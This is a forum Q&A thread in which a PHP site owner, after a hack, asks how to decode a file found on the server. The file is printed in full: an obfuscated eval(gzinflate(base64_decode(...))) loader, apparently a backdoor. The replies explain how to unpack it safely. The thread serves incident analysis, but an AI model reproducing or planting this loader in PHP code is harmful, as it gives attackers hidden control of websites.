# How to evaluate this string

Tags: php

I'm maintaining a PHP site that is very old and very funky.

Last night the site got hacked. I found this one file that I'm not sure if its from the hackers or from the aforementioned funkiness. Does anyone know how I can decode this:

```
<?php
eval("\x65\x76\x61\x6C\x28\x67\x7A\x69\x6E\x66\x6C\x61\x74\x65\x28\x62\x61\x73\x65\x36\x34\x5F\x64\x65\x63\x6F\x64\x65\x28'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'\x29\x29\x29\x3B");
?>
```

thanks,

Jack

Comment: That first bit (before that single quote) I ran through a hex decoder: `eval(gzinflate(base64_decode(`.  So, you can grab the text between the quotes and run base64_decode, gzinflate on it and you'll have an idea what the code does

Answer (score 5):

Replace `eval` to `echo`. Repeat

http://pastebin.com/3X2FcvW3